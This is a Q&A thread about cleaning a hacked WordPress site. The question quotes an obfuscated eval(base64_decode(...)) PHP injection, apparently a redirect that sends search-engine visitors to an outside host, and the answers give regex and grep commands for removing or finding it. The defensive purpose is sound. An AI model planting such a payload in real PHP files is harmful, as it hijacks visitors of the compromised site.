1

So basically a WordPress site that wasn't updated was compromised. I've downloaded the files, identified the infected, and I found a pattern.

At the top of the file there is code like the following

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Or something close with different characters.

I'm using grepWin to remove the code from a few hundred PHP files. What regex code can I use that will remove code that begins with eval(base64_decode( followed by a long line of text and ended with "));. Not the text in between is different for some files.

[note - the code I used above was shorten, don't want to trigger any virus protectors with suspicious code]

kenorb
  • 155,785
  • 88
  • 678
  • 743
Julian
  • 1,853
  • 5
  • 27
  • 48
  • 2
    Most likely, the string is the same in every file (I've been affected by this before and this was the case, since it just decodes to a simple redirect). Just do a search and replace for the whole string. – jeremyharris Jan 15 '13 at 21:04
  • 1
    When I fixed one of these, I found a standard search and replace was fine - all strings were identical. Btw, a few points: (a) it's perfectly safe to put the real code here, and the exact string is of public interest since people may be searching by it, (b) posting it here should not trigger any virus detectors, and (c) if you want to see the malicious code without accidentally running it, decode it [here](http://www.tareeinternet.com/scripts/decrypt.php). – halfer Jan 15 '13 at 21:05
  • Of interest: http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus – halfer Jan 15 '13 at 21:08
  • 1
    Why try to "fix" all the files? Why not force WordPress to reinstall the latest update, then replace all the plugins and the theme with new installs too? If nothing else, that will reduce what needs to be "cleaned". – webaware Jan 15 '13 at 21:43
  • 1
    @jeremyharris I decided to do that, there were only two versions of the malicious code so no regex was needed afterall – Julian Jan 16 '13 at 00:00
  • @Julian cool. Run a scan for `eval(` afterwards to make sure you caught everything. And lock down your wordpress install :) – jeremyharris Jan 16 '13 at 00:32

2 Answers2

0

A regex for matching that would be as follows:

/eval\(base64_decode\("[^\)]+\)\)\;/

With WinGrep, use this string, though. Windows grep doesn't like the surrounding slashes.

eval\(base64_decode\("[^\)]+\)\)\;

Then just replace with an empty string. Grep doesn't usually provide this replace functionality, but I noted you said you were using WinGrep, which does provide a global replace function.

AlienHoboken
  • 2,750
  • 20
  • 23
  • WindowsGrep 2.3 from [www.wingrep.com] doesn't handle this RE for the given input correctly - a match seems to be limited to about 1024 characters. – Armali Jan 10 '14 at 10:18
0

The following grep command may help to find such files:

grep -R return.*base64_decode  .

or:

grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

However you should use special scanners for it, see: PHP security scanner.

Community
  • 1
  • 1
kenorb
  • 155,785
  • 88
  • 678
  • 743